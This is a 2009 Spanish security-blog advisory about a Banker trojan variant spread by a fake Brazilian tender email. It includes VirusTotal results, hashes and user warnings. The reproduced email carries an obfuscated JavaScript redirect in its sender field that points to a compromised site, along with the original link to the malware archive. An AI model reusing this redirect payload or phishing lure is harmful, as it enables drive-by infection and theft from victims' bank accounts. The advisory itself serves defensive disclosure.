Nueva variante de Banker, del que el ELISTARA actual ya pide muestra para analizar, si se ha ejecutado
Una variante del Banker de ayer ( https://blog.satinfo.es/?p=1382 ) ha sido detectada hoy en otro mail distinto, tambien con remitente de Brasil:
Untitled Document
—– Original Message —–
From: “$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:rodrigues@lagosnet.com.br”>rodrigues@lagosnet.com.br>
To: <xxxxxxxxxxxxxxxx>
Sent: Wednesday, October 21, 2009 4:11 AM
Subject: Edital de Licitacao
> De acordo com o Edital de Licitacao numero 2.765/2009,que sera realizada
> dia 30/10/2009, estamos enviando os itens a serem licitados e o local
onde
> sera realizada, no link abaixo descriminado.
> Caso esteja interessado favor enviar proposta no e-mail
> tor de
Licitacoes
>
>
> ANEXO:
> http://www.fileden.com/files/<interceptado>/EditaldeLicitacao.zip
>
La descompresion de este fichero EditaldeLicitacao.zip crea un EXE con el mismo nombre, cuya ejecución genera un UPD.EXE del que el actual ELISTARA pediría muestra para analizar y controlar, si bien ya se hubiera aparcado a c:\muestras para que no se ejecutara a partir del siguiente reinicio.
Tampoco esta variante está controlada actualmente por AV conocidos como Trend, Symantec, AVG, Avast …, segun análisis actual con VirusTotal :
File EditaldeLicitacao.exe received on 2009.10.21 08:44:42 (UTC)
Result: 21/41 (51.22%)
Antivirus Version Last Update Result
a-squared 4.5.0.41 2009.10.21 Trojan.Crypt.Delf.E!IK
AhnLab-V3 5.0.0.2 2009.10.20 –
AntiVir 7.9.1.42 2009.10.21 HEUR/Malware
Antiy-AVL 2.0.3.7 2009.10.21 Trojan/Win32.heuristic
Authentium 5.1.2.4 2009.10.21 W32/Banload.E.gen!Eldorado
Avast 4.8.1351.0 2009.10.20 –
AVG 8.5.0.420 2009.10.20 –
BitDefender 7.2 2009.10.21 Trojan.Crypt.Delf.E
CAT-QuickHeal 10.00 2009.10.21 –
ClamAV 0.94.1 2009.10.21 –
Comodo 2677 2009.10.21 –
DrWeb 5.0.0.12182 2009.10.21 Trojan.DownLoad.53756
eSafe 7.0.17.0 2009.10.19 –
eTrust-Vet 35.1.7075 2009.10.19 –
F-Prot 4.5.1.85 2009.10.20 W32/Banload.E.gen!Eldorado
F-Secure 9.0.15300.0 2009.10.20 Trojan.Crypt.Delf.E
Fortinet 3.120.0.0 2009.10.21 PossibleThreat
GData 19 2009.10.21 Trojan.Crypt.Delf.E
Ikarus T3.1.1.72.0 2009.10.21 Trojan.Crypt.Delf.E
Jiangmin 11.0.800 2009.10.21 –
K7AntiVirus 7.10.875 2009.10.20 –
Kaspersky 7.0.0.125 2009.10.21 Trojan-Downloader.Win32.Agent.cslr
McAfee 5777 2009.10.20 –
McAfee+Artemis 5777 2009.10.20 Artemis!E119E30651DE
McAfee-GW-Edition 6.8.5 2009.10.21 Heuristic.Malware
Microsoft 1.5101 2009.10.21 TrojanDownloader:Win32/Banload.gen!B
NOD32 4527 2009.10.20 a variant of Win32/TrojanDownloader.Banload.OOC
Norman 6.03.02 2009.10.20 W32/Malware
nProtect 2009.1.8.0 2009.10.21 –
Panda 10.0.2.2 2009.10.20 Generic Trojan
PCTools 4.4.2.0 2009.10.19 –
Prevx 3.0 2009.10.21 Medium Risk Malware
Rising 21.52.22.00 2009.10.21 –
Sophos 4.46.0 2009.10.21 Mal/Generic-A
Sunbelt 3.2.1858.2 2009.10.20 Trojan.Win32.Generic!BT
Symantec 1.4.4.12 2009.10.21 –
TheHacker 6.5.0.2.049 2009.10.20 –
TrendMicro 8.950.0.1094 2009.10.21 –
VBA32 3.12.10.11 2009.10.20 –
ViRobot 2009.10.21.1998 2009.10.21 –
VirusBuster 4.6.5.0 2009.10.20 –
Additional information
File size: 450560 bytes
MD5…: e119e30651deb7d0dcca5c204dc6cbc5
SHA1..: c0cb64f20b9b3fbb56eef36803a5272926602054
Su ejecucion descargaría troyanos droppers de peligrosos bankers, todo lo cual pasamos a controlar con la nueva version del ELISTARA de hoy 19.51
Como siempre recordar que no deben pulsarse en links, ficheros o imagenes existentes en mails recibidos sin ser solicitados !!!
saludos
ms, 21-10-2009
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Los comentarios están cerrados.